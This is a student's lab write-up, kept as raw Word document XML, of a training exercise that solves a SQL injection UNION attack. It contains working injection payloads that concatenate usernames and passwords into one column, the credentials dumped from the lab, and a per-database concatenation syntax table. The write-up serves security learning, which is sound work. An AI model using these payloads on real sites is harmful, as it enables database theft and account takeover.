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1D61D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B118BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION Attack: Retrieving Multiple Values in a Single Column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC7643">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4F4CC6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026D3DE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— category filter in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114401F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33582D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69B18D4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3639C5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confirmed injection. Column check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403A6EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5140D5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'+UNION+SELECT+NULL,'abc'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68785101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440B5A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Two columns but only the second one accepts strings. The first column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3151F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is not string-compatible — integer or similar type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E513535">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6E3078">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F692D61">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6A0789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183DD8A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B4B5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goal as Lab 09 — dump the `users` table and log in as administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0579DC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constraint this time is only one column is available for string output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176C09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Both `username` and `password` need to come back through a single column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3884FA18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BE0BCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE903A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D809D4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662E374B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5018BE8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Concatenated both values into one column using `||` with a separator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477AC529">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1597C44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'+UNION+SELECT+NULL,username||'~'||password+FROM+users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6026231E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3173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`||` operator concatenates strings in Oracle/PostgreSQL. The `~`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E087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acts as a delimiter so the output is readable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298F3AD7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B74499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administrator~s3cur3p4ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE685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wiener~password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A6E89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F9D4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Grabbed the administrator's password from the response and logged in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105EF0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Lab solved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773B084E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9BC5C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E29372A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630B358E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>## What I Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217ABD69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C96BD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When you're limited to one string column, concatenation is the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EA8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standard workaround. The separator matters — pick something that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD68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won't appear in the actual values. `~` works well, so does `:`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71611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 `|`. If you use no separator the values blur together and become</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217363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hard to split, especially if usernames and passwords have variable lengths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69894137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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555"/>
      </w:tblGrid>
      <w:tr w14:paraId="4422C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6BF4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66DAD3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</w:tr>
      <w:tr w14:paraId="418CE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87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Oracle / PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30E53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`username</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61983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2F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64E04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CONCAT(username,'~',password)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="40EC4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38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MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31880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username+'~'+password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E0933D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A98C5F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3798C3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also the last lab in the UNION attack series — by this point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39123F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full toolkit is covered: column count, type detection, single</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106EFA4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column extraction, multi-column extraction, and now concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA7D0D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>when columns are limited.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232CB"/>
    <w:rsid w:val="45E9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customStyle="1" w:styleId="7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2026-06-01T09:18:25Z</dcterms:created>
  <dc:creator>Aswin Krishna</dc:creator>
  <cp:lastModifiedBy>Aswin Krishna</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-01T09:20:56Z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86D0629E318946189BA8EBC4714215FE_12</vt:lpwstr>
  </property>
</Properties>
</file>